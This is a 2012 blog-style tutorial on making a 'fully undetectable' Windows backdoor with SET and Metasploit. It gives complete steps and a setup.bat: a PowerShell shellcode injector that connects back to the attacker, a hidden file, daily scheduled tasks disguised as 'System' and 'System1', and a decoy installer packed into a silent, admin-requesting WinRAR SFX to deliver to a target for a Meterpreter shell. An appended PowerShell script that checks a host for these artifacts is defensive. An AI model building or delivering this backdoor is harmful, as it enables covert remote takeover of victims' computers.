November 27, 2012, 10:21

How To Get A Fully Undetectable Backdoor/Payload With SET And Metasploit

First Step: Generate the payload with SET

Open SET and select the first option, Social-Engineering Attacks.

Then select option 10, Powershell Attack Vectors.

Then select the first option, Powershell Alphanumeric Shellcode Injector.

Enter the IP address the payload should connect back to (your attacking machine).

Enter the port.

When SET asks whether to start the listener now, answer no; the listener is started from Armitage in the third step.

Go to the path SET prints. It contains two PowerShell injection files, one for x86 and one for x64.

Second Step: Create the backdoor

Edit the two files and add "@echo off" as the first line of each one, so that each becomes a batch file that runs the PowerShell one-liner it contains.

Rename them ps86.bat (the x86 injector) and ps64.bat (the x64 injector) and copy them to a Windows machine with WinRAR installed.

Create another batch file named setup.bat with this code inside:


@echo off
rem Everything is extracted to %userprofile% by the SFX archive built below.
rem Set-ExecutionPolicy only governs script files, not the command-line
rem one-liners in ps86.bat/ps64.bat; it is kept because the SFX requests
rem administrative access, so the call succeeds.
powershell Set-ExecutionPolicy Unrestricted
cd %userprofile%
rem Hide this file; ps86.bat and ps64.bat stay visible.
attrib +H setup.bat
rem Persistence: two daily tasks at 10:00 that relaunch the injectors.
rem /F overwrites a task of the same name, so re-running setup.bat is harmless.
schtasks /create /F /SC DAILY /TN "System" /TR "%userprofile%\ps86.bat" /ST 10:00
schtasks /create /F /SC DAILY /TN "System1" /TR "%userprofile%\ps64.bat" /ST 10:00
rem Run both injectors now. Only the one matching the bitness of the PowerShell
rem process that runs it injects successfully; the other fails, which is why
rem both are launched.
start ps86.bat
start ps64.bat
rem Launch the decoy installer so the user sees what they expected.
start old.exe

Get a legitimate executable installer, rename it old.exe, and add it together with the three .bat files to a WinRAR archive.



Select "Create SFX archive", click the Advanced tab and click "SFX options".

General tab, path to extract: %userprofile%
Setup tab, "Run after extraction": setup.bat
Modes tab: select "Hide all"
Advanced tab: select "Request administrative access"

Update tab, overwrite mode: select "Overwrite all files"
Text and icon tab: add an icon



Click OK twice and wait for the archive to be created.

Third Step: Spread and get a Meterpreter

Start a listener in Armitage on the IP address and port you gave SET.

Deliver the archive to the target and wait for it to be executed: setup.bat runs the injectors immediately, and the scheduled tasks run them again every day at 10:00.

Get your Meterpreter.
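The post ends here, but a practitioner wants to confirm what setup.bat actually left on the target, and an incident responder wants to know what to look for. The PowerShell script below is an added example, not code from the original post or from SET: it reports the two scheduled tasks, the files dropped in %userprofile%, any hidden powershell.exe processes with their full command lines, and the machine-wide execution policy. The task names "System" and "System1", the file names and the %userprofile% location are the ones the tutorial uses; the checks themselves are my assumption of what should be verified. Run it from an elevated PowerShell prompt on the Windows machine.

```powershell
# Added example (not from the original post): inspects a Windows host for the
# artifacts the tutorial's setup.bat leaves behind. Names come from the post;
# the checks are an assumption about what a tester verifies after deployment.
# Run elevated so that schtasks /V shows every task.

$profileDir = $env:USERPROFILE
$taskNames  = @('System', 'System1')
$fileNames  = @('setup.bat', 'ps86.bat', 'ps64.bat', 'old.exe')

function Get-TaskArtifacts {
    # schtasks exists on every Windows version the tutorial targets;
    # /FO CSV /V yields one row per task with the command line in "Task To Run".
    $rows = schtasks /query /FO CSV /V 2>$null | ConvertFrom-Csv
    foreach ($name in $taskNames) {
        # Tasks created with /TN "System" live in the root folder, hence "\System".
        $task = $rows | Where-Object { $_.TaskName -eq "\$name" } | Select-Object -First 1
        if ($task) {
            New-Object PSObject -Property @{
                Check  = "task $name"
                Found  = $true
                Detail = '{0} ({1}, next run {2})' -f $task.'Task To Run', $task.'Schedule Type', $task.'Next Run Time'
            }
        } else {
            New-Object PSObject -Property @{ Check = "task $name"; Found = $false; Detail = '' }
        }
    }
}

function Get-FileArtifacts {
    foreach ($file in $fileNames) {
        $path = Join-Path $profileDir $file
        if (Test-Path -LiteralPath $path) {
            # -Force is required because attrib +H made setup.bat hidden.
            $item = Get-Item -LiteralPath $path -Force
            New-Object PSObject -Property @{
                Check  = "file $file"
                Found  = $true
                Detail = 'attributes: {0}, size: {1} bytes' -f $item.Attributes, $item.Length
            }
        } else {
            New-Object PSObject -Property @{ Check = "file $file"; Found = $false; Detail = '' }
        }
    }
}

function Get-RunningInjectors {
    # The injectors run as hidden powershell.exe processes; WMI exposes the full
    # command line, including the encoded command SET generated. The shell
    # running this script shows up here as well.
    Get-WmiObject Win32_Process -Filter "Name = 'powershell.exe'" |
        ForEach-Object {
            New-Object PSObject -Property @{
                Check  = "process $($_.ProcessId)"
                Found  = $true
                Detail = $_.CommandLine
            }
        }
}

$results = @(Get-TaskArtifacts) + @(Get-FileArtifacts) + @(Get-RunningInjectors)
$results | Select-Object Check, Found, Detail | Format-Table -AutoSize -Wrap

# Set-ExecutionPolicy Unrestricted in setup.bat changes the LocalMachine scope.
'Execution policy (LocalMachine): {0}' -f (Get-ExecutionPolicy -Scope LocalMachine)
```

Everything this script prints is exactly what a host inspection, or any tool that looks at scheduled tasks and process command lines, sees. "Fully undetectable" in the title refers to the antivirus file scanners of the time, not to the persistence, which is plainly visible as two daily tasks named "System" and "System1" pointing at batch files in the user profile, and as powershell.exe processes carrying an encoded command.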